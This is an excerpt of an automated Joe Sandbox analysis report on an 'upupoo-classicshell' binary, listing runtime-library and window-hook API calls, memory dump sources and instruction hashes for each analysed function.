                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4682
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4694
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46A6
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46B8
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46CA
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46DC
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46EE
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4700
                                                                                                              • _free.LIBCMT ref: 6E0B4330
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B4352
                                                                                                              • _free.LIBCMT ref: 6E0B4367
                                                                                                              • _free.LIBCMT ref: 6E0B4372
                                                                                                              • _free.LIBCMT ref: 6E0B4394
                                                                                                              • _free.LIBCMT ref: 6E0B43A7
                                                                                                              • _free.LIBCMT ref: 6E0B43B5
                                                                                                              • _free.LIBCMT ref: 6E0B43C0
                                                                                                              • _free.LIBCMT ref: 6E0B43F8
                                                                                                              • _free.LIBCMT ref: 6E0B43FF
                                                                                                              • _free.LIBCMT ref: 6E0B441C
                                                                                                              • _free.LIBCMT ref: 6E0B4434
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                               • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                               • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                              • String ID:
                                                                                                              • API String ID: 161543041-0
                                                                                                              • Opcode ID: a732cd3373503f54fd2caa795b2edb2db7a00cb744531d2ae425a4e5d65a16fa
                                                                                                              • Instruction ID: f64c5e7e220ef1f6330af5e84d58ac6fa8bfe08a26de0c8e34ebf4ff88158883
                                                                                                              • Opcode Fuzzy Hash: a732cd3373503f54fd2caa795b2edb2db7a00cb744531d2ae425a4e5d65a16fa
                                                                                                              • Instruction Fuzzy Hash: 0B317071508301EFEB518AF9E980B8E73E9FF00794F144919E069EB254FF32AA518720
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00C363F0,0000000C,00C2760E,00000000,00000000,?,00C25FFC,00C27A05,00C25657,?,?,00C25FFC,00C22FE3,?,00C22FE3), ref: 00C274E5
                                                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 00C274F0
                                                                                                                • Part of subcall function 00C29AAF: Sleep.KERNEL32(000003E8,?,?,00C27436,KERNEL32.DLL,?,00C29FEA,?,00C25651,00C25FFC,?,?,00C25FFC,00C22FE3,?,00C22FE3), ref: 00C29ABB
                                                                                                                • Part of subcall function 00C29AAF: GetModuleHandleW.KERNEL32(00C25FFC,?,?,00C27436,KERNEL32.DLL,?,00C29FEA,?,00C25651,00C25FFC,?,?,00C25FFC,00C22FE3,?,00C22FE3), ref: 00C29AC4
                                                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00C27519
                                                                                                              • GetProcAddress.KERNEL32(00C25FFC,DecodePointer), ref: 00C27529
                                                                                                              • __lock.LIBCMT ref: 00C2754B
                                                                                                              • InterlockedIncrement.KERNEL32(F08B0000), ref: 00C27558
                                                                                                              • __lock.LIBCMT ref: 00C2756C
                                                                                                              • ___addlocaleref.LIBCMT ref: 00C2758A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                              • API String ID: 1028249917-2843748187
                                                                                                              • Opcode ID: fecc1b5498271ee0c1ad28ea55c5ae53381cc38e27533bcb84a27ef040d92242
                                                                                                              • Instruction ID: dabf3ed6750e1f79e4533842146ee53cad3c760701735daf3a8cf779601ae04f
                                                                                                              • Opcode Fuzzy Hash: fecc1b5498271ee0c1ad28ea55c5ae53381cc38e27533bcb84a27ef040d92242
                                                                                                              • Instruction Fuzzy Hash: 9711E1B1904B11EFDB20EF75E841B8EFBE0AF14310F10462DE4A996BA1CB74AA40DF50
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 100081A5
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 100081B1
                                                                                                              • _free.LIBCMT ref: 100081BC
                                                                                                              • _free.LIBCMT ref: 100081C7
                                                                                                              • _free.LIBCMT ref: 100081D2
                                                                                                              • _free.LIBCMT ref: 100081DD
                                                                                                              • _free.LIBCMT ref: 100081E8
                                                                                                              • _free.LIBCMT ref: 100081F3
                                                                                                              • _free.LIBCMT ref: 100081FE
                                                                                                              • _free.LIBCMT ref: 1000820C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: a87a5622d80a5fec1180487fedaa7e5dad31db6d37aaeb734d883ec773964e2c
                                                                                                              • Instruction ID: f64c62f210d3c4fab1e46b08c4a2babb921ab4eb9b72a43628e91e1a8baa87ed
                                                                                                              • Opcode Fuzzy Hash: a87a5622d80a5fec1180487fedaa7e5dad31db6d37aaeb734d883ec773964e2c
                                                                                                              • Instruction Fuzzy Hash: 4711747A900108AFEB51DF54C942CED3BB5FF05690F9140A6B9089B226DA35EE50EB80
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 6E0B152F
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B153B
                                                                                                              • _free.LIBCMT ref: 6E0B1546
                                                                                                              • _free.LIBCMT ref: 6E0B1551
                                                                                                              • _free.LIBCMT ref: 6E0B155C
                                                                                                              • _free.LIBCMT ref: 6E0B1567
                                                                                                              • _free.LIBCMT ref: 6E0B1572
                                                                                                              • _free.LIBCMT ref: 6E0B157D
                                                                                                              • _free.LIBCMT ref: 6E0B1588
                                                                                                              • _free.LIBCMT ref: 6E0B1596
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 6e37525eceac3f533d3a38067f32e4099513106755e6482143bb62747d26b375
                                                                                                              • Instruction ID: 4c6f1e6c0d22536b2627a8f33bae01f68a904a43c2a0d92675463e9bd9c0599c
                                                                                                              • Opcode Fuzzy Hash: 6e37525eceac3f533d3a38067f32e4099513106755e6482143bb62747d26b375
                                                                                                              • Instruction Fuzzy Hash: E011A476104108EFCB01DFD6DA81EDD3BA9FF04354F5145A2FA189F225EB32DA509B80
                                                                                                              APIs
                                                                                                              • RegisterWindowMessageW.USER32(ClassicStartMenu.StartMenuMsg,?,?), ref: 00C2190F
                                                                                                              • PostMessageW.USER32(?,00000000), ref: 00C2191E
                                                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 00C21945
                                                                                                              • Sleep.KERNEL32(00000064), ref: 00C21957
                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00C2195F
                                                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 00C21988
                                                                                                                • Part of subcall function 00C213F0: ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: Taskbar Created), ref: 00C213FD
                                                                                                                • Part of subcall function 00C213F0: SetTimer.USER32(?,00000001,00000064,00000000), ref: 00C21410
                                                                                                              Strings
                                                                                                              • ClassicStartMenu.StartMenuMsg, xrefs: 00C2190A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Message$HookPostUnhookWindows$File@@QuitRegisterSleepTimerWindow
                                                                                                              • String ID: ClassicStartMenu.StartMenuMsg
                                                                                                              • API String ID: 2850628872-1923710789
                                                                                                              • Opcode ID: af02a80655f7bc13cf0909cacda0fa45b74ceaecece0bffd2605e256841a014a
                                                                                                              • Instruction ID: a939d5a85fb2e02d9ead71e08ebf5b695db79fc02a464bcf02da07f00cbddd3d
                                                                                                              • Opcode Fuzzy Hash: af02a80655f7bc13cf0909cacda0fa45b74ceaecece0bffd2605e256841a014a
                                                                                                              • Instruction Fuzzy Hash: 94317CB52143429FD710DF24E964B2BB3E5EB95B01F048818F551CB6A1C7B6DE84CB72
                                                                                                              APIs
                                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,1000B6DF,?,00000000,?,00000000,00000000), ref: 1000AFAC
                                                                                                              • __fassign.LIBCMT ref: 1000B027
                                                                                                              • __fassign.LIBCMT ref: 1000B042
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 1000B068
                                                                                                              • WriteFile.KERNEL32(?,?,00000000,1000B6DF,00000000,?,?,?,?,?,?,?,?,?,1000B6DF,?), ref: 1000B087
                                                                                                              • WriteFile.KERNEL32(?,?,00000001,1000B6DF,00000000,?,?,?,?,?,?,?,?,?,1000B6DF,?), ref: 1000B0C0
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmp
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 1324828854-0
                                                                                                              • Opcode ID: 690a3027da326de177d2d59d2ea2b163b808028bb59637e7210ba7f7deaf4494
                                                                                                              • Instruction ID: 33e939531d0a515d7d24f719cc679a4440ea9898e460d19b4a1d97a9964afaa8
                                                                                                              • Opcode Fuzzy Hash: 690a3027da326de177d2d59d2ea2b163b808028bb59637e7210ba7f7deaf4494
                                                                                                              • Instruction Fuzzy Hash: 2751C170E106499FEB10CFA8DC95AEEBBF8FF09340F11415AE951E7295D670E981CBA0
                                                                                                              APIs
                                                                                                              • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,6E0B7434,?,00000000,?,00000000,00000000), ref: 6E0B6D01
                                                                                                              • __fassign.LIBCMT ref: 6E0B6D7C
                                                                                                              • __fassign.LIBCMT ref: 6E0B6D97
                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 6E0B6DBD
                                                                                                              • WriteFile.KERNEL32(?,?,00000000,6E0B7434,00000000,?,?,?,?,?,?,?,?,?,6E0B7434,?), ref: 6E0B6DDC
                                                                                                              • WriteFile.KERNEL32(?,?,00000001,6E0B7434,00000000,?,?,?,?,?,?,?,?,?,6E0B7434,?), ref: 6E0B6E15
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                              • String ID:
                                                                                                              • API String ID: 1324828854-0
                                                                                                              • Opcode ID: c67915cf4f17000c31cbc0542c8cd4d9f21cde83154aac9709970bc4e1705c17
                                                                                                              • Instruction ID: d52bf908a1dc0f782c6ed401f190e43969b29f073918ab2d06e4d7432b50dcad
                                                                                                              • Opcode Fuzzy Hash: c67915cf4f17000c31cbc0542c8cd4d9f21cde83154aac9709970bc4e1705c17
                                                                                                              • Instruction Fuzzy Hash: 5B51AE71A10249AFDB10CFE8D895BEEBBF8FF19704F10451AE965E7281E731A941CB60
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 00C2181F
                                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00C21834
                                                                                                              • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 00C21849
                                                                                                              • GetWindowLongW.USER32(?,000000FC), ref: 00C21864
                                                                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 00C21876
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$Long$CallProc
                                                                                                              • String ID: $
                                                                                                              • API String ID: 513923721-3993045852
                                                                                                              • Opcode ID: 2eb927511f1d53d8a0f1eafc1fa77763247f1d681855b0d8a8415eec0f782e1e
                                                                                                              • Instruction ID: e4b0896c6f87521c36fe920c6d7826f080e0ffb1e98e669c7f5b7f5054b139e3
                                                                                                              • Opcode Fuzzy Hash: 2eb927511f1d53d8a0f1eafc1fa77763247f1d681855b0d8a8415eec0f782e1e
                                                                                                              • Instruction Fuzzy Hash: 384107B1608710AFC328DF19D88491BFBF8FF98710F148A1DF5AA876A1D731E9418B91
                                                                                                              APIs
                                                                                                                • Part of subcall function 1000ACF9: _free.LIBCMT ref: 1000AD22
                                                                                                              • _free.LIBCMT ref: 1000AD83
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 1000AD8E
                                                                                                              • _free.LIBCMT ref: 1000AD99
                                                                                                              • _free.LIBCMT ref: 1000ADED
                                                                                                              • _free.LIBCMT ref: 1000ADF8
                                                                                                              • _free.LIBCMT ref: 1000AE03
                                                                                                              • _free.LIBCMT ref: 1000AE0E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 2882d0eb60e70101d5ce44f11dd15c658c3f2d9149b540b32ac8b62c3af22bd9
                                                                                                              • Instruction ID: faa8de974e089025a9ff2a2335d9aa5c3d9e3b3ca956ec36e4031fb07d0a6f9e
                                                                                                              • Opcode Fuzzy Hash: 2882d0eb60e70101d5ce44f11dd15c658c3f2d9149b540b32ac8b62c3af22bd9
                                                                                                              • Instruction Fuzzy Hash: 9D11B135940B04EBF930EBB0CC07FCB77ADEF01380F400925B69D66156CA3AB4C59640
                                                                                                              APIs
                                                                                                                • Part of subcall function 6E0B4772: _free.LIBCMT ref: 6E0B479B
                                                                                                              • _free.LIBCMT ref: 6E0B47FC
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B4807
                                                                                                              • _free.LIBCMT ref: 6E0B4812
                                                                                                              • _free.LIBCMT ref: 6E0B4866
                                                                                                              • _free.LIBCMT ref: 6E0B4871
                                                                                                              • _free.LIBCMT ref: 6E0B487C
                                                                                                              • _free.LIBCMT ref: 6E0B4887
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: ab63de39dd25b907716cb31e48b2361037be5e45d13f7649d304b11a5864194d
                                                                                                              • Instruction ID: 84b5682a38803b0d3a44520606975e33749a34a8ccf33a8fb010be54c5867e5e
                                                                                                              • Opcode Fuzzy Hash: ab63de39dd25b907716cb31e48b2361037be5e45d13f7649d304b11a5864194d
                                                                                                              • Instruction Fuzzy Hash: 5C110A71585B04FAD661ABF0CC45FCF779CBF06704F804C15A3AEA7150EB76AA06C691
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000001,00000000,10005FDE,1000421C,10003C4C,?,10003E49,?,00000001,?,?,00000001,?,100146E0,0000000C,10003F52), ref: 10006264
                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10006272
                                                                                                              • SetLastError.KERNEL32(00000000,10003E49,?,00000001,?,?,00000001,?,100146E0,0000000C,10003F52,?,00000001,?), ref: 1000627F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$Value___vcrt_
                                                                                                              • String ID:
                                                                                                              • API String ID: 483936075-0
                                                                                                              • Opcode ID: 4134c441ff1b667284df0a9e97644d1263a5e8bc091f1a2139e204116331b238
                                                                                                              • Instruction ID: 040005f3ee799f5f55fdc0611c9e5094b79c9a1cc234f665cd1c30559a2954a5
                                                                                                              • Opcode Fuzzy Hash: 4134c441ff1b667284df0a9e97644d1263a5e8bc091f1a2139e204116331b238
                                                                                                              • Instruction Fuzzy Hash: 34F0C83AA499319BF212D734AC49A6F2AA6EB8DBF17310119F904D619DDF204C02A2D0
                                                                                                              APIs
                                                                                                              • GetLastError.KERNEL32(00000001,00000000,6E0AB8B8,6E0A8DEC,6E0A86D2,?,6E0A88CF,?,00000001,?,?,00000001,?,6E0C3B08,0000000C,6E0A89D8), ref: 6E0ABAB2
                                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E0ABAC0
                                                                                                              • SetLastError.KERNEL32(00000000,6E0A88CF,?,00000001,?,?,00000001,?,6E0C3B08,0000000C,6E0A89D8,?,00000001,?), ref: 6E0ABACD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$Value___vcrt_
                                                                                                              • String ID:
                                                                                                              • API String ID: 483936075-0
                                                                                                              • Opcode ID: b70f5e3904d122e0f0c50b26b4c7df85b947708489d31745cbf0f5c3195978e0
                                                                                                              • Instruction ID: a8f6849b28b63ad08c9460b591a4fcaffc9275a9903ca0017dbc68281eb1950b
                                                                                                              • Opcode Fuzzy Hash: b70f5e3904d122e0f0c50b26b4c7df85b947708489d31745cbf0f5c3195978e0
                                                                                                              • Instruction Fuzzy Hash: 4EF0F936519A195B862116FDAC4C7BF36B8FB87BB57110114F6149618DDF7148024F94
                                                                                                              APIs
                                                                                                              • _ValidateScopeTableHandlers.LIBCMT ref: 6E0ACC70
                                                                                                              • __FindPESection.LIBCMT ref: 6E0ACC8A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FindHandlersScopeSectionTableValidate
                                                                                                              • String ID:
                                                                                                              • API String ID: 876702719-0
                                                                                                              • Opcode ID: 259002e11f90dda2798d6b0440bff852f3a75d94c9f529e8b29147c60574de7a
